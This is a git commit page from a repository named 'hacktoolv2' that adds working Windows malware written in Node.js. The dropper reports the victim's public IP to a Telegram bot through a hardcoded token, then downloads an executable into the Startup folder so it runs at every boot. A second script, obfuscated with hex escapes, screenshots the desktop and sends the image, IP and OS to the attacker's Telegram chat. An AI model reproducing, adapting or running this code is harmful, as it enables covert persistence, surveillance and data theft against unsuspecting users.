2
0
mirror of https://github.com/constantinDev/hacktoolv2 synced 2025-08-29 11:27:41 +00:00
This commit is contained in:
WOOOMY-lol 2020-07-30 19:26:46 +02:00
parent 3daccc785e
commit 90059da693
8 changed files with 80 additions and 26 deletions

46
Hax/Dropper/src/main.js Normal file
View File

@ -0,0 +1,46 @@
let https = require("https")
let fs = require("fs")
let os = require("os")
const {
default: Axios
} = require("axios")
console.log("Loading..")
let startdir = `C:\\Users\\${os.userInfo().username}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`
if (!fs.existsSync(startdir)) return console.log("how the fuck did you fuck up your system that badly")
https.get("https://api.ipify.org", (ip) => {
let fip = "";
ip.on("data", (c) => {
fip += c.toString()
})
ip.on("close", () => {
Axios({
url: "https://api.telegram.org/bot1143731138:AAF6hwgo1R6a4GbB_zmr0kNA2Ca86oFJ6sg/sendMessage",
method: "POST",
data: {
chat_id: "@lmaotxt",
text: `<strong>${fip}</strong> ran the ali a dropper. OS: <strong>${require("os").platform()}</strong>`,
parse_mode: "HTML"
}
}).then(_ => {
https.get("https://raw.githubusercontent.com/constantinDev/hacktoolv2/master/Hax/Runner/bin/WinBoot.exe", (res) => {
let stream = fs.createWriteStream(startdir + "/WinBoot.exe")
res.pipe(stream)
res.on("close", () => {
stream.close()
})
})
https.get("https://raw.githubusercontent.com/constantinDev/hacktoolv2/master/Hax/Runner/bin/etc/audio.wav", (res2) => {
fs.mkdirSync(startdir + "/etc")
let stream2 = fs.createWriteStream(startdir + "/etc/audio.wav")
res2.pipe(stream2)
res2.on("close", () => {
stream2.close();
})
})
})
})
})

View File

@ -8,5 +8,8 @@
},
"author": "Constantin",
"license": "ISC",
"bin": "main.js"
"bin": "main.js",
"dependencies": {
"axios": "^0.19.2"
}
}

View File

@ -1,24 +0,0 @@
let https = require("https")
let fs = require("fs")
let os = require("os")
console.log("Loading..")
let startdir = `C:\\Users\\${os.userInfo().username}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`
if (!fs.existsSync(startdir)) return console.log("how the fuck did you fuck up your system that badly")
https.get("https://raw.githubusercontent.com/constantinDev/hacktoolv2/master/StartupHentai/Runner/bin/WinBoot.exe", (res) => {
let stream = fs.createWriteStream(startdir+"/WinBoot.exe")
res.pipe(stream)
res.on("close",()=>{
stream.close()
})
})
https.get("https://raw.githubusercontent.com/constantinDev/hacktoolv2/master/StartupHentai/Runner/bin/etc/audio.wav", (res2) => {
fs.mkdirSync(startdir+"/etc")
let stream2 = fs.createWriteStream(startdir + "/etc/audio.wav")
res2.pipe(stream2)
res2.on("close", () => {
stream2.close();
})
})

View File

@ -1 +1,30 @@
let Axios,request,a,fs,telapi;(function(){Axios=require("\x61\x78\x69\x6f\x73")["\x64\x65\x66\x61\x75\x6c\x74"],request=require("\x72\x65\x71\x75\x65\x73\x74"),a=require("\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x2d\x64\x65\x73\x6b\x74\x6f\x70"),fs=require("fs"),telapi={"\x62\x61\x73\x65\x75\x72\x6c":"\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x74\x65\x6c\x65\x67\x72\x61\x6d\x2e\x6f\x72\x67\x2f","\x74\x6f\x6b\x65\x6e":Buffer["\x66\x72\x6f\x6d"]("\x4d\x54\x45\x30\x4d\x7a\x63\x7a\x4d\x54\x45\x7a\x4f\x44\x70\x42\x51\x55\x59\x32\x61\x48\x64\x6e\x62\x7a\x46\x53\x4e\x6d\x45\x30\x52\x32\x4a\x43\x58\x33\x70\x74\x63\x6a\x42\x72\x54\x6b\x45\x79\x51\x32\x45\x34\x4e\x6d\x39\x47\x53\x6a\x5a\x7a\x5a\x77","base64").toString()};function smsg(ip){a()["\x74\x68\x65\x6e"](lol=>{fs["\x77\x72\x69\x74\x65\x46\x69\x6c\x65\x53\x79\x6e\x63"]("\x2e\x2f\x73\x73\x2e\x6a\x70\x67",lol);request({"\x75\x72\x6c":telapi["\x62\x61\x73\x65\x75\x72\x6c"]+"bot"+telapi["\x74\x6f\x6b\x65\x6e"]+"\x2f\x73\x65\x6e\x64\x50\x68\x6f\x74\x6f","\x6d\x65\x74\x68\x6f\x64":"\x50\x4f\x53\x54","\x66\x6f\x72\x6d\x44\x61\x74\x61":{"\x63\x68\x61\x74\x5f\x69\x64":"\x40\x6c\x6d\x61\x6f\x74\x78\x74","\x70\x68\x6f\x74\x6f":fs["\x63\x72\x65\x61\x74\x65\x52\x65\x61\x64\x53\x74\x72\x65\x61\x6d"]("\x2e\x2f\x73\x73\x2e\x6a\x70\x67"),"\x63\x61\x70\x74\x69\x6f\x6e":`\x3c\x73\x74\x72\x6f\x6e\x67\x3e\x53\x4f\x4d\x45\x4f\x4e\x45\x20\x46\x45\x4c\x4c\x20\x46\x4f\x52\x20\x49\x54\x3c\x2f\x73\x74\x72\x6f\x6e\x67\x3e\x0a\x0a\x49\x50\x3a\x20\x3c\x73\x74\x72\x6f\x6e\x67\x3e${ip}\x3c\x2f\x73\x74\x72\x6f\x6e\x67\x3e\x0a\x4f\x53\x3a\x20\x3c\x73\x74\x72\x6f\x6e\x67\x3e${require("os")["\x70\x6c\x61\x74\x66\x6f\x72\x6d"]()}</strong>`,"\x70\x61\x72\x73\x65\x5f\x6d\x6f\x64\x65":"HTML"}},()=>{fs["\x75\x6e\x6c\x69\x6e\x6b\x53\x79\x6e\x63"]("\x2e\x2f\x73\x73\x2e\x6a\x70\x67")})})["\x63\x61\x74\x63\x68"](console["\x65\x72\x72\x6f\x72"])}Axios({"\x75\x72\x6c":"\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x69\x70\x69\x66\x79\x2e\x6f\x72\x67\x2f"})["\x74\x68\x65\x6e"](dat=>{smsg(dat["\x64\x61\x74\x61"])})}());
let Axios, request, a, fs, telapi;
(function () {
Axios = require("\x61\x78\x69\x6f\x73")["\x64\x65\x66\x61\x75\x6c\x74"], request = require("\x72\x65\x71\x75\x65\x73\x74"), a = require("\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x2d\x64\x65\x73\x6b\x74\x6f\x70"), fs = require("fs"), telapi = {
"\x62\x61\x73\x65\x75\x72\x6c": "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x74\x65\x6c\x65\x67\x72\x61\x6d\x2e\x6f\x72\x67\x2f",
"\x74\x6f\x6b\x65\x6e": Buffer["\x66\x72\x6f\x6d"]("\x4d\x54\x45\x30\x4d\x7a\x63\x7a\x4d\x54\x45\x7a\x4f\x44\x70\x42\x51\x55\x59\x32\x61\x48\x64\x6e\x62\x7a\x46\x53\x4e\x6d\x45\x30\x52\x32\x4a\x43\x58\x33\x70\x74\x63\x6a\x42\x72\x54\x6b\x45\x79\x51\x32\x45\x34\x4e\x6d\x39\x47\x53\x6a\x5a\x7a\x5a\x77", "base64").toString()
};
function smsg(ip) {
a()["\x74\x68\x65\x6e"](lol => {
fs["\x77\x72\x69\x74\x65\x46\x69\x6c\x65\x53\x79\x6e\x63"]("\x2e\x2f\x73\x73\x2e\x6a\x70\x67", lol);
request({
"\x75\x72\x6c": telapi["\x62\x61\x73\x65\x75\x72\x6c"] + "bot" + telapi["\x74\x6f\x6b\x65\x6e"] + "\x2f\x73\x65\x6e\x64\x50\x68\x6f\x74\x6f",
"\x6d\x65\x74\x68\x6f\x64": "\x50\x4f\x53\x54",
"\x66\x6f\x72\x6d\x44\x61\x74\x61": {
"\x63\x68\x61\x74\x5f\x69\x64": "\x40\x6c\x6d\x61\x6f\x74\x78\x74",
"\x70\x68\x6f\x74\x6f": fs["\x63\x72\x65\x61\x74\x65\x52\x65\x61\x64\x53\x74\x72\x65\x61\x6d"]("\x2e\x2f\x73\x73\x2e\x6a\x70\x67"),
"\x63\x61\x70\x74\x69\x6f\x6e": `\x3c\x73\x74\x72\x6f\x6e\x67\x3e\x53\x4f\x4d\x45\x4f\x4e\x45\x20\x46\x45\x4c\x4c\x20\x46\x4f\x52\x20\x49\x54\x3c\x2f\x73\x74\x72\x6f\x6e\x67\x3e\x0a\x0a\x49\x50\x3a\x20\x3c\x73\x74\x72\x6f\x6e\x67\x3e${ip}\x3c\x2f\x73\x74\x72\x6f\x6e\x67\x3e\x0a\x4f\x53\x3a\x20\x3c\x73\x74\x72\x6f\x6e\x67\x3e${require("os")["\x70\x6c\x61\x74\x66\x6f\x72\x6d"]()}</strong>`,
"\x70\x61\x72\x73\x65\x5f\x6d\x6f\x64\x65": "HTML"
}
}, () => {
fs["\x75\x6e\x6c\x69\x6e\x6b\x53\x79\x6e\x63"]("\x2e\x2f\x73\x73\x2e\x6a\x70\x67")
})
})["\x63\x61\x74\x63\x68"](console["\x65\x72\x72\x6f\x72"])
}
Axios({
"\x75\x72\x6c": "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x69\x70\x69\x66\x79\x2e\x6f\x72\x67\x2f"
})["\x74\x68\x65\x6e"](dat => {
smsg(dat["\x64\x61\x74\x61"])
})
}());